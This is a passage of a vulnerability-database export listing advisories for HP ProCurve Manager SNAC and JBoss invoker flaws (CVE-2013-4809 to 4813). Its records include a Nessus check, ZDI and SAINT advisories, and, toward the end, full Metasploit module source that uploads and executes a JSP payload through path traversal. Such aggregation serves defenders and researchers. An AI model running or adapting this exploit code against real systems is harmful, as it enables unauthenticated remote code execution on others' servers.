security_hole(port);\n }\n else non_vuln = make_list(non_vuln, port);\n}\n\nif (max_index(non_vuln) == 1) exit(0, \"The web server tested on port \" + port + 
\" is not affected.\");\nelse if (max_index(non_vuln) > 1) exit(0, \"None of the ports tested (\" +join(non_vuln, sep:\", \")+ \") contain web servers that are affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:01:24", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaws exist within the Agent servlet. This servlet is vulnerable to a command injection vulnerability when processing HEAD requests. A remote attacker can leverage this vulnerability to execute remote code under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ AgentController Servlet Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4813"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-228", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-228/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:29", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UpdateCertificatesServlet. 
This servlet improperly sanitizes the 'fileName' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-225", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-225/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:25", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the GetEventsServlet. This servlet contains a SQL injection vulnerability in the sort and dir arguments. 
This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ GetEventsServlet SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4809"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-227", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-227/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:01:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UpdateDomainControllerServlet. This servlet improperly sanitizes the 'adCert' argument allowing the remote attacker could upload a .jsp file. 
This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ SNAC Registration Server UpdateDomainControllerServlet Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-226", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus and Application Lifecycle Management. Authentication is not required to exploit this vulnerability. The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated attacker can post a marshalled object allowing them to install an arbitrary application on the target server. 
A remote attacker can abuse this to execute remote code under the context of the SYSTEM user in HP PCM Plus and with administrative privileges on Application Lifecycle Management.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ and Application Lifecycle Management JBoss Invoker Servlets Marshalled Object Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-229", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-229/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2022-01-26T11:36:35", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. 
\n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:7F3C5163C30890F5F0C5C51957FFFEEF", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:56", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. 
The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:D7E7AE713FCC306B414BDDDCF928FB38", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:38", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. 
\n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:66194A0423C6048B45F3300165835412", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:15", "description": "Added: 10/03/2013 \nCVE: [CVE-2013-4812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4812>) \nBID: [62348](<http://www.securityfocus.com/bid/62348>) \nOSVDB: [97155](<http://www.osvdb.org/97155>) \n\n\n### Background\n\nHP ProCurve Manager (PCM) is a secure, advanced Windows-based network management platform that allows administrators to configure, update, monitor, and troubleshoot ProCurve devices centrally. \n\n### Problem\n\nThe SNAC registration server in HP ProCurve Manager (PCM) is vulnerable to remote code execution. 
The issue is due to the `**UpdateCertificatesServlet**` servlet not properly sanitizing the fileName argument. By uploading a crafted JSP file, a remote attacker could execute code under the context of the SYSTEM user. \n\n### Resolution\n\nUpdate as directed in [HP Security Bulletin HPSBPV02918](<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-225/> \n\n\n### Limitations\n\nExploit works on HP ProCurve Manager 4.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-03T00:00:00", "type": "saint", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet FileName Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-03T00:00:00", "id": "SAINT:279F95372544AFCA3000201D14830112", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_pcm_snac_updatecertificateservlet_filename", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:17", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into 
web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet, which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: 
[97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet, which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:F331FA17751309C5BD461AF4E8A90312", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:34", "description": "Added: 10/23/2013 \nCVE: 
[CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet, which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet, which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. 
\n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:73B78E4CC6A84900DDFE755805A5092F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-14T10:21:16", "description": "This Metasploit module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This Metasploit module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "zdt", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-17T00:00:00", "id": "1337DAY-ID-21240", "href": "https://0day.today/exploit/description/21240", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\r\n files, just having into account binary writes aren't allowed. Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4812' ],\r\n [ 'OSVDB', '97155' ],\r\n [ 'BID', '62348' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /\"success\":\"true\"/\r\n return Exploit::CheckCode::Appears\r\n 
end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n rand_password = rand_text_alpha(4 + rand(10))\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\")\r\n post_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\")\r\n post_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Certificate import fails/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => 
\"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/21240", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T19:43:51", "description": "This Metasploit module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This Metasploit module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0.", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "zdt", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-17T00:00:00", "id": "1337DAY-ID-21241", "href": "https://0day.today/exploit/description/21241", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\r\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload 